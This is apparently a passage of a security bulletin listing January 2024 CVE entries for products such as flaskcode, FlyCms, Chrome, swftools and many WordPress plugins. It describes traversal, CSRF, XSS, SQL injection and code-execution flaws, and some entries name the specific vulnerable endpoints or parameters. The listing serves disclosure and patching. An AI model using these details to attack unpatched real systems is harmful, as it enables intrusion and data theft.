flaskcode_for_python -- flaskcode_for_pythonAn issue was discovered in the flaskcode package through 0.0.8 for Python. An unauthenticated directory traversal, exploitable with a GET request to a /resource-data/<file_path>.txt URI (from views.py), allows attackers to read arbitrary files.2024-01-13not yet calculatedCVE-2023-52288
cve@mitre.org
flaskcode_for_python -- flaskcode_for_pythonAn issue was discovered in the flaskcode package through 0.0.8 for Python. An unauthenticated directory traversal, exploitable with a POST request to a /update-resource-data/<file_path> URI (from views.py), allows attackers to write to arbitrary files.2024-01-13not yet calculatedCVE-2023-52289
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/scorerule_save.2024-01-18not yet calculatedCVE-2024-22601
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/links/add_link.2024-01-18not yet calculatedCVE-2024-22603
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/update_group_save.2024-01-18not yet calculatedCVE-2024-22699
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_conf_updagte.2024-01-18not yet calculatedCVE-2024-22817
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/site/filterKeyword_save.2024-01-18not yet calculatedCVE-2024-22818
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_templets_update.2024-01-18not yet calculatedCVE-2024-22819
cve@mitre.org
folio -- mod-data-export-springHard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.2024-01-19not yet calculatedCVE-2024-23687
disclosure@vulncheck.com
form_vibes -- form_vibesThe Form Vibes WordPress plugin does not filter the "delete_entries" parameter from user requests, leading to an SQL injection vulnerability.2024-01-16not yet calculatedCVE-2022-3764
contact@wpscan.com
fusionpbx -- fusionpbxFusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.2024-01-19not yet calculatedCVE-2024-23387
vultures@jpcert.or.jp
gentoo -- pkg_postinstpkg_postinst in the Gentoo ebuild for Slurm through 22.05.3 unnecessarily calls chown to assign root's ownership on files in the live root filesystem. This could be exploited by the slurm user to become the owner of root-owned files.2024-01-15not yet calculatedCVE-2020-36770
cve@mitre.org
gentoo_portage -- gentoo_portageIn Gentoo Portage before 3.0.47, there is missing PGP validation of executed code: the standalone emerge-webrsync downloads a .gpgsig file but does not perform signature verification. Unless emerge-webrsync is used, Portage is not vulnerable.2024-01-12not yet calculatedCVE-2016-20021
cve@mitre.org
google -- chromeOut of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2024-01-16not yet calculatedCVE-2024-0517
chrome-cve-admin@google.com
google -- chromeType confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2024-01-16not yet calculatedCVE-2024-0518
chrome-cve-admin@google.com
google -- chromeOut of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2024-01-16not yet calculatedCVE-2024-0519
chrome-cve-admin@google.com
gpu -- kernelA GPU kernel can read sensitive data from another GPU kernel (even from another user or app) through an optimized GPU memory region called local memory on various architectures.2024-01-16not yet calculatedCVE-2023-4969
cret@cert.org
grn -- evewa3_communityCross Site Scripting (XSS) vulnerability in GRN Software Group eVEWA3 Community version 31 through 53, allows attackers to gain escalated privileges via crafted request to login panel.2024-01-17not yet calculatedCVE-2023-25295
cve@mitre.org
hummerrisk -- hummerriskAn issue in HummerRisk v.1.10 through 1.4.1 allows an authenticated attacker to execute arbitrary code via a crafted request to the service/LicenseService component.2024-01-16not yet calculatedCVE-2023-43449
cve@mitre.org
jasper -- jasperAn invalid memory write issue in Jasper-Software Jasper v.4.1.1 and before allows a local attacker to execute arbitrary code.2024-01-16not yet calculatedCVE-2023-51257
cve@mitre.org
jave2 -- jave2An issue was discovered in Jave2 version 3.3.1, allows attackers to execute arbitrary code via the FFmpeg function.2024-01-12not yet calculatedCVE-2023-48909
cve@mitre.org
joommasters_for_prestashop -- joommasters_for_prestashopIn the module "Jms Setting" (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a blind SQL injection.2024-01-19not yet calculatedCVE-2023-50030
cve@mitre.org
jpg_driver -- jpg_driverIn the jpg driver, there is a possible missing permission check. This could lead to local information disclosure with System execution privileges needed.2024-01-18not yet calculatedCVE-2023-48339
security@unisoc.com
jpg_driver -- jpg_driverIn the jpg driver, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.2024-01-18not yet calculatedCVE-2023-48355
security@unisoc.com
jpg_driver -- jpg_driverIn the jpg driver, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed.2024-01-18not yet calculatedCVE-2023-48356
security@unisoc.com
knovos -- discovery_v.22.67.0An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component.2024-01-16not yet calculatedCVE-2023-47459
cve@mitre.org
knovos -- discovery_v.22.67.0SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.2024-01-16not yet calculatedCVE-2023-47460
cve@mitre.org
kodbox -- kodboxAn issue discovered in kodbox through 1.43 allows attackers to arbitrarily add Administrator accounts via a crafted GET request.2024-01-16not yet calculatedCVE-2023-39691
cve@mitre.org
kodbox -- kodboxkodbox v1.43 was discovered to contain a cross-site scripting (XSS) vulnerability via the operation and login logs.2024-01-16not yet calculatedCVE-2023-52068
cve@mitre.org
kodbox -- kodboxkodbox v1.49.04 was discovered to contain a cross-site scripting (XSS) vulnerability via the URL parameter.2024-01-17not yet calculatedCVE-2023-52069
cve@mitre.org
libebml -- libebmlIn libebml before 1.4.5, an integer overflow in MemIOCallback.cpp can occur when reading or writing. It may result in buffer overflows.2024-01-12not yet calculatedCVE-2023-52339
cve@mitre.org
linux -- kernelA use-after-free issue was found in igmp_start_timer in net/ipv4/igmp.c in the network sub-component in the Linux Kernel. This flaw allows a local user to observe a refcnt use-after-free issue when receiving an igmp query packet, leading to a kernel information leak.2024-01-16not yet calculatedCVE-2024-0584
secalert@redhat.com
meta -- spark_studioPrior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application.2024-01-16not yet calculatedCVE-2024-23347
cve-assign@fb.com
mingsoft -- mcmsAn issue in mingSoft MCMS v.5.2.4 allows a remote attacker to obtain sensitive information via a crafted script to the password parameter.2024-01-16not yet calculatedCVE-2023-51282
cve@mitre.org
mod-remote-storage -- mod-remote-storageHard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.2024-01-19not yet calculatedCVE-2024-23685
disclosure@vulncheck.com
moko_technology_ltd -- mokosmart_mkgw1_ble_gateway_v.1.1.1An issue in MOKO TECHNOLOGY LTD MOKOSmart MKGW1 BLE Gateway v.1.1.1 and before allows a remote attacker to escalate privileges via the session management component of the administrative web interface.2024-01-16not yet calculatedCVE-2023-51059
cve@mitre.org
molecularfaces -- molecularfacesMolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.2024-01-19not yet calculatedCVE-2024-0758
disclosure@vulncheck.com
multisigwallet_0xf0c99 -- multisigwallet_0xf0c99MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.2024-01-19not yet calculatedCVE-2023-47033
cve@mitre.org
ncr -- terminal_handler_v.1.5.1Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component.2024-01-20not yet calculatedCVE-2023-47024
cve@mitre.org
nextcloud -- deckDeck is a kanban-style organization tool aimed at personal planning and project organization for teams, integrated with Nextcloud. In affected versions users could be tricked into executing malicious code that would execute in their browser via HTML sent as a comment. It is recommended that Nextcloud Deck is upgraded to version 1.9.5 or 1.11.2. There are no known workarounds for this vulnerability.2024-01-18not yet calculatedCVE-2024-22213
security-advisories@github.com
ofcms -- ofcmsCross Site Scripting vulnerability in OFCMS v.1.14 allows a remote attacker to obtain sensitive information via a crafted payload to the title addition component.2024-01-16not yet calculatedCVE-2023-51807
cve@mitre.org
openvswitch -- openvswitchopenvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c.2024-01-19not yet calculatedCVE-2024-22563
cve@mitre.org
paddle -- paddleCode Injection in paddlepaddle/paddle2024-01-20not yet calculatedCVE-2024-0521
security@huntr.dev
perl -- spreadsheet::parsexlsxThe Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.2024-01-18not yet calculatedCVE-2024-23525
cve@mitre.org
phasecheckserver -- phasecheckserverIn phasecheckserver, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed.2024-01-18not yet calculatedCVE-2023-48352
security@unisoc.com
pillow -- pillowPillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).2024-01-19not yet calculatedCVE-2023-50447
cve@mitre.org
pops!_rebel_for_android -- pops!_rebel_for_androidThe POPS! Rebel application 5.0 for Android, in the POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.2024-01-20not yet calculatedCVE-2023-46447
cve@mitre.org
prestashop -- prestashopIn the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The method `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial HTTP call and exploited to forge a SQL injection.2024-01-19not yet calculatedCVE-2023-46351
cve@mitre.org
prestashop_modules_for_prestashop -- prestashop_modules_for_prestashopIn the module "Sliding cart block" (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection.2024-01-19not yet calculatedCVE-2023-50028
cve@mitre.org
cve@mitre.org
relax-and-recover -- relax-and-recoverRelax-and-Recover (aka ReaR) through 2.7 creates a world-readable initrd when using GRUB_RESCUE=y. This allows local attackers to gain access to system secrets otherwise only readable by root.2024-01-12not yet calculatedCVE-2024-23301
cve@mitre.org
cve@mitre.org
rptc_0x3b08c -- rptc_0x3b08cRPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.2024-01-19not yet calculatedCVE-2023-47035
cve@mitre.org
cve@mitre.org
rymcu_forest -- rymcu_forestAn issue in rymcu forest v.0.02 allows a remote attacker to obtain sensitive information via manipulation of the HTTP body URL in the com.rymcu.forest.web.api.common.UploadController file.2024-01-13not yet calculatedCVE-2023-51804
cve@mitre.org
scada-- lts_v2.7.5.2 build_4551883606An issue was discovered in Scada-LTS v2.7.5.2 build 4551883606 and before, allows remote attackers with low-level authentication to escalate privileges, execute arbitrary code, and obtain sensitive information via Event Handlers function.2024-01-13not yet calculatedCVE-2023-33472
cve@mitre.org
sonicwall -- capture_client_for_windowsSonicWall Capture Client version 3.7.10, NetExtender client version 10.2.337 and earlier versions are installed with sfpmonitor.sys driver. The driver has been found to be vulnerable to Denial-of-Service (DoS) caused by Stack-based Buffer Overflow vulnerability.2024-01-18not yet calculatedCVE-2023-6340
PSIRT@sonicwall.com
spip -- spipSPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.2024-01-19not yet calculatedCVE-2024-23659
cve@mitre.org
cve@mitre.org
cve@mitre.org
stackideas -- easydiscussSQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.2024-01-16not yet calculatedCVE-2023-51810
cve@mitre.org
cve@mitre.org
cve@mitre.org
strangbee -- thehiveStrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator.2024-01-19not yet calculatedCVE-2024-22876
cve@mitre.org
strangbee -- thehiveStrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.2024-01-19not yet calculatedCVE-2024-22877
cve@mitre.org
studio_network_solutions -- sharebrowserStudio Network Solutions ShareBrowser before 7.0 on macOS mishandles signature verification, aka PMP-2636.2024-01-17not yet calculatedCVE-2023-44077
cve@mitre.org
stupid_simple_cms --stupid_simple_cmsStupid Simple CMS <=1.2.4 is vulnerable to Cross Site Scripting (XSS) in the editing section of the article content.2024-01-17not yet calculatedCVE-2024-22714
cve@mitre.org
stupid_simple_cms --stupid_simple_cmsStupid Simple CMS <=1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin-edit.php.2024-01-17not yet calculatedCVE-2024-22715
cve@mitre.org
sunnytoo -- stblogsearchSunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component.2024-01-19not yet calculatedCVE-2023-43985
cve@mitre.org
cve@mitre.org
swftools -- swftools | swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c. | 2024-01-19 | not yet calculated | CVE-2024-22562 | cve@mitre.org
swftools -- swftools | A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602. | 2024-01-19 | not yet calculated | CVE-2024-22911 | cve@mitre.org
swftools -- swftools | A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution. | 2024-01-19 | not yet calculated | CVE-2024-22912 | cve@mitre.org
swftools -- swftools | A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution. | 2024-01-19 | not yet calculated | CVE-2024-22913 | cve@mitre.org
swftools -- swftools | A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service. | 2024-01-19 | not yet calculated | CVE-2024-22914 | cve@mitre.org
swftools -- swftools | A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution. | 2024-01-19 | not yet calculated | CVE-2024-22915 | cve@mitre.org
swftools -- swftools | swftools 0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587. | 2024-01-19 | not yet calculated | CVE-2024-22919 | cve@mitre.org
swftools -- swftools | swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c. | 2024-01-19 | not yet calculated | CVE-2024-22920 | cve@mitre.org
swftools -- swftools | swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576. | 2024-01-19 | not yet calculated | CVE-2024-22955 | cve@mitre.org
swftools -- swftools | swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838. | 2024-01-19 | not yet calculated | CVE-2024-22956 | cve@mitre.org
swftools -- swftools | swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190. | 2024-01-19 | not yet calculated | CVE-2024-22957 | cve@mitre.org
tduck-platform -- tduck-platform | SQL Injection vulnerability in TDuckCloud tduck-platform v.4.0 allows a remote attacker to obtain sensitive information via the getFormKey parameter in the search function of the FormDataMysqlService.java file. | 2024-01-13 | not yet calculated | CVE-2023-51805 | cve@mitre.org
telephone_service -- telephone_service | In telephone service, there is a possible improper input validation. This could lead to local information disclosure with no additional execution privileges needed. | 2024-01-18 | not yet calculated | CVE-2023-48354 | security@unisoc.com
tenghutos -- tws-200 | An issue discovered in TenghuTOS TWS-200 firmware version V4.0-201809201424 allows a remote attacker to execute arbitrary code via a crafted command on the ping page component. | 2024-01-18 | not yet calculated | CVE-2023-51217 | cve@mitre.org
three_r_solution_corporation_(japan) -- multiple_products | An insufficient technical documentation issue exists in thermal camera TMC series, all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data. | 2024-01-15 | not yet calculated | CVE-2024-22028 | vultures@jpcert.or.jp
tp_link -- wifi_camera | Insecure Permission vulnerability in TP Link TC70 and C200 WIFI Camera v.3 firmware v.1.3.4 and fixed in v.1.3.11 allows a physically proximate attacker to obtain sensitive information via a connection to the UART pin components. | 2024-01-17 | not yet calculated | CVE-2023-49515 | cve@mitre.org
uniswapfrontrunbot_0xdb94c -- uniswapfrontrunbot_0xdb94c | A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors. | 2024-01-19 | not yet calculated | CVE-2023-47034 | cve@mitre.org
vsp_driver -- vsp_driver | In vsp driver, there is a possible use after free due to a logic error. This could lead to local denial of service with System execution privileges needed. | 2024-01-18 | not yet calculated | CVE-2023-48353 | security@unisoc.com
vsp_driver -- vsp_driver | In vsp driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. | 2024-01-18 | not yet calculated | CVE-2023-48357 | security@unisoc.com
webkul_qloapps -- webkul_qloapps | An issue in webkul qloapps before v1.6.0 allows an attacker to obtain sensitive information via the id_order parameter. | 2024-01-17 | not yet calculated | CVE-2023-36235 | cve@mitre.org
wordpress -- wordpress | The Contact Form by WD WordPress plugin through 1.13.23 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. | 2024-01-16 | not yet calculated | CVE-2023-2655 | contact@wpscan.com
wordpress -- wordpress | The Advanced AJAX Product Filters WordPress plugin does not sanitize the 'term_id' POST parameter before outputting it in the page, leading to a reflected Cross-Site Scripting issue. | 2024-01-16 | not yet calculated | CVE-2021-24432 | contact@wpscan.com
wordpress -- wordpress | The simple sort&search WordPress plugin through 0.0.3 does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" uses allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor. | 2024-01-16 | not yet calculated | CVE-2021-24433 | contact@wpscan.com
wordpress -- wordpress | The Qyrr WordPress plugin before 0.7 does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the data_uri_to_meta AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role as low as Contributor, allowing any user with such a role (and above) to set a malicious data-uri in arbitrary QR Code posts, leading to a Stored Cross-Site Scripting issue. | 2024-01-16 | not yet calculated | CVE-2021-24559 | contact@wpscan.com
wordpress -- wordpress | The WooCommerce Currency Switcher FOX WordPress plugin before 1.3.7 was vulnerable to LFI attacks via the "woocs" shortcode. | 2024-01-16 | not yet calculated | CVE-2021-24566 | contact@wpscan.com
wordpress -- wordpress | The Super Forms - Drag & Drop Form Builder WordPress plugin before 6.0.4 does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking a CSRF check, making the attack easier to perform against any user. | 2024-01-16 | not yet calculated | CVE-2022-0402 | contact@wpscan.com
wordpress -- wordpress | The WPGraphQL WooCommerce WordPress plugin before 0.12.4 does not prevent unauthenticated attackers from enumerating a shop's coupon codes and values via GraphQL. | 2024-01-16 | not yet calculated | CVE-2022-1563 | contact@wpscan.com
wordpress -- wordpress | The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in its license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. | 2024-01-16 | not yet calculated | CVE-2022-1609 | contact@wpscan.com
wordpress -- wordpress | The Coru LFMember WordPress plugin through 1.0.2 does not have a CSRF check in place when adding a new game, and is lacking sanitization as well as escaping in its settings, allowing attackers to make a logged in admin add an arbitrary game with XSS payloads. | 2024-01-16 | not yet calculated | CVE-2022-1618 | contact@wpscan.com
wordpress -- wordpress | The Core Control WordPress plugin through 1.2.1 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. | 2024-01-16 | not yet calculated | CVE-2022-1760 | contact@wpscan.com
wordpress -- wordpress | The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.0 does not escape some of its form fields before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 2024-01-16 | not yet calculated | CVE-2022-23179 | contact@wpscan.com
wordpress -- wordpress | The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.4 doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscribers, to update and change various settings. | 2024-01-16 | not yet calculated | CVE-2022-23180 | contact@wpscan.com
wordpress -- wordpress | The Slide Anything WordPress plugin before 2.3.47 does not properly sanitize or escape the slide title before outputting it in the admin pages, allowing a logged in user with roles as low as Author to inject a JavaScript payload into the slide title even when the unfiltered_html capability is disabled. | 2024-01-16 | not yet calculated | CVE-2022-2413 | contact@wpscan.com
wordpress -- wordpress | The Dokan WordPress plugin before 3.6.4 allows vendors to inject arbitrary JavaScript in product reviews, which may allow them to run stored XSS attacks against other users like site administrators. | 2024-01-16 | not yet calculated | CVE-2022-3194 | contact@wpscan.com
wordpress -- wordpress | The Contact Form Entries WordPress plugin before 1.3.0 does not validate data when it is output in a CSV file, which could lead to CSV injection. | 2024-01-16 | not yet calculated | CVE-2022-3604 | contact@wpscan.com
wordpress -- wordpress | The WP Best Quiz WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks. | 2024-01-16 | not yet calculated | CVE-2022-3739 | contact@wpscan.com
wordpress -- wordpress | The Font Awesome 4 Menus WordPress plugin through 4.7.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). | 2024-01-16 | not yet calculated | CVE-2022-3829 | contact@wpscan.com
wordpress -- wordpress | The Seed Social WordPress plugin before 2.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). | 2024-01-16 | not yet calculated | CVE-2022-3836 | contact@wpscan.com
wordpress -- wordpress | The 3dprint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form. | 2024-01-16 | not yet calculated | CVE-2022-3899 | contact@wpscan.com
wordpress -- wordpress | The Customer Reviews for WooCommerce WordPress plugin before 5.17.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-01-16 | not yet calculated | CVE-2023-0079 | contact@wpscan.com
wordpress -- wordpress | The UpQode Google Maps WordPress plugin through 1.0.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-01-16 | not yet calculated | CVE-2023-0094 | contact@wpscan.com
wordpress -- wordpress | The GiveWP WordPress plugin before 2.24.1 does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks. | 2024-01-16 | not yet calculated | CVE-2023-0224 | contact@wpscan.com
wordpress -- wordpress | The Qubely WordPress plugin before 1.8.5 does not validate and escape some of its block options before outputting them back in a page/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-01-16 | not yet calculated | CVE-2023-0376 | contact@wpscan.com
wordpress -- wordpress | The Calculated Fields Form WordPress plugin before 1.1.151 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). | 2024-01-16 | not yet calculated | CVE-2023-0389 | contact@wpscan.com
wordpress -- wordpress | The Print Invoice & Delivery Notes for WooCommerce WordPress plugin before 4.7.2 is vulnerable to reflected XSS by echoing a GET value in an admin note within the WooCommerce orders page. This means that this vulnerability can be exploited against users with the edit_others_shop_orders capability. WooCommerce must be installed and active. This vulnerability is caused by a urldecode() after cleanup with esc_url_raw(), allowing double encoding. | 2024-01-16 | not yet calculated | CVE-2023-0479 | contact@wpscan.com
wordpress -- wordpress | The hiWeb Migration Simple WordPress plugin through 2.0.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. | 2024-01-16 | not yet calculated | CVE-2023-0769 | contact@wpscan.com
wordpress -- wordpress | The User registration & user profile WordPress plugin through 2.0 does not have CSRF checks in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack. | 2024-01-16 | not yet calculated | CVE-2023-0824 | contact@wpscan.com
wordpress -- wordpress | The Formidable Forms WordPress plugin before 6.2 unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present. | 2024-01-16 | not yet calculated | CVE-2023-1405 | contact@wpscan.com
wordpress -- wordpress | The Directorist WordPress plugin before 7.5.4 is vulnerable to Local File Inclusion as it does not validate the file parameter when importing CSV files. | 2024-01-16 | not yet calculated | CVE-2023-2252 | contact@wpscan.com
wordpress -- wordpress | The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability delete arbitrary logs via a CSRF attack. | 2024-01-16 | not yet calculated | CVE-2023-3178 | contact@wpscan.com
wordpress -- wordpress | The WordPress Database Administrator WordPress plugin through 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. | 2024-01-16 | not yet calculated | CVE-2023-3211 | contact@wpscan.com
wordpress -- wordpress | The Lana Shortcodes WordPress plugin before 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-01-16 | not yet calculated | CVE-2023-3372 | contact@wpscan.com
wordpress -- wordpress | The IURNY by INDIGITALL WordPress plugin before 3.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). | 2024-01-16 | not yet calculated | CVE-2023-3647 | contact@wpscan.com
wordpress -- wordpress | The My Account Page Editor WordPress plugin before 1.3.2 does not validate the profile picture to be uploaded, allowing any authenticated users, such as subscribers, to upload arbitrary files to the server, leading to RCE. | 2024-01-16 | not yet calculated | CVE-2023-4536 | contact@wpscan.com
wordpress -- wordpress | The All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation. | 2024-01-16 | not yet calculated | CVE-2023-4703 | contact@wpscan.com
wordpress -- wordpress | The WP Discord Invite WordPress plugin before 2.5.1 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator into submitting a crafted request. | 2024-01-17 | not yet calculated | CVE-2023-5006 | contact@wpscan.com
wordpress -- wordpress | The Track The Click WordPress plugin before 0.3.12 does not properly sanitize query parameters to the stats REST endpoint before using them in a database query, allowing a logged in user with an author role or higher to perform time based blind SQLi attacks on the database. | 2024-01-17 | not yet calculated | CVE-2023-5041 | contact@wpscan.com
wordpress -- wordpress | The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2024-01-16 | not yet calculated | CVE-2023-5558 | contact@wpscan.com
wordpress -- wordpress | The Royal Elementor Addons and Templates WordPress plugin before 1.3.81 does not ensure that users accessing posts via an AJAX action (and a REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content. | 2024-01-16 | not yet calculated | CVE-2023-5922 | contact@wpscan.com
wordpress -- wordpress | The Ecwid Ecommerce Shopping Cart WordPress plugin before 6.12.5 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. | 2024-01-16 | not yet calculated | CVE-2023-6292 | contact@wpscan.com
